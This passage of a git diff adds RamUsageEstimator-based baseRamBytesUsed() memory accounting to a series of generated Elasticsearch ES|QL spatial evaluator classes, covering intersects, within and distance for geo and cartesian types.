@@ -52,6 +55,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndConstantEvaluator.java
index 47b5e68d03bef..ac9bfccec01fd 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndConstantEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.geo.Component2D;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BytesRefBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialIntersectsGeoSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsGeoSourceAndConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndSourceEvaluator.java
index fdf6c21d4a05e..71c201dcfddf2 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndSourceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoSourceAndSourceEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BytesRefBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialIntersectsGeoSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsGeoSourceAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -51,6 +54,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndConstantEvaluator.java
index f342bbdcdd2ca..dfaede0a64bb7 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndConstantEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.geo.Component2D;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialWithinCartesianPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinCartesianPointDocValuesAndConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, LongBlock leftBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndSourceEvaluator.java
index 032e20003c788..b31efe9b051d6 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndSourceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianPointDocValuesAndSourceEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BytesRefBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialWithinCartesianPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinCartesianPointDocValuesAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -52,6 +55,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndConstantEvaluator.java
index 3df427c4e03f4..7fbb157491142 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndConstantEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.geo.Component2D;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BytesRefBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialWithinCartesianSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinCartesianSourceAndConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndSourceEvaluator.java
index ebbef2086182b..24369d61f20ad 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndSourceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinCartesianSourceAndSourceEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BytesRefBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialWithinCartesianSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinCartesianSourceAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -51,6 +54,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndConstantEvaluator.java
index eacce4c73d714..6fb51c160c67c 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndConstantEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.geo.Component2D;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialWithinGeoPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinGeoPointDocValuesAndConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, LongBlock leftBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndSourceEvaluator.java
index 06666a4cfe8b0..5bccc68c1a866 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndSourceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoPointDocValuesAndSourceEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BytesRefBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialWithinGeoPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinGeoPointDocValuesAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -52,6 +55,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndConstantEvaluator.java
index 7fdba8dfecf1d..d15673952dc24 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndConstantEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.geo.Component2D;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BytesRefBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialWithinGeoSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinGeoSourceAndConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndSourceEvaluator.java
index 54488302c7487..649c9005060be 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndSourceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialWithinGeoSourceAndSourceEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BytesRefBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialWithinGeoSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialWithinGeoSourceAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -51,6 +54,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndConstantEvaluator.java
index f1ebad92bea1a..6195786300371 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndConstantEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StDistanceCartesianPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceCartesianPointDocValuesAndConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock leftBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndSourceEvaluator.java
index 3af1fa1f990b8..9106036859cd7 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndSourceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianPointDocValuesAndSourceEvaluator.java
@@ -6,6 +6,7 @@
 
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.DoubleBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StDistanceCartesianPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceCartesianPointDocValuesAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -50,6 +53,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndConstantEvaluator.java
index 08d882b0b2cf2..2f2f88ecb5fbd 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndConstantEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.DoubleBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StDistanceCartesianSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceCartesianSourceAndConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, BytesRefBlock leftBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndSourceEvaluator.java
index b29915ff22c7e..910f4a6ba81fb 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndSourceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceCartesianSourceAndSourceEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.DoubleBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StDistanceCartesianSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceCartesianSourceAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -50,6 +53,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndConstantEvaluator.java
index fc042e0f31c13..31b727dff6655 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndConstantEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StDistanceGeoPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceGeoPointDocValuesAndConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock leftBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndSourceEvaluator.java
index 7e68261503800..4980fcc3d5969 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndSourceEvaluator.java
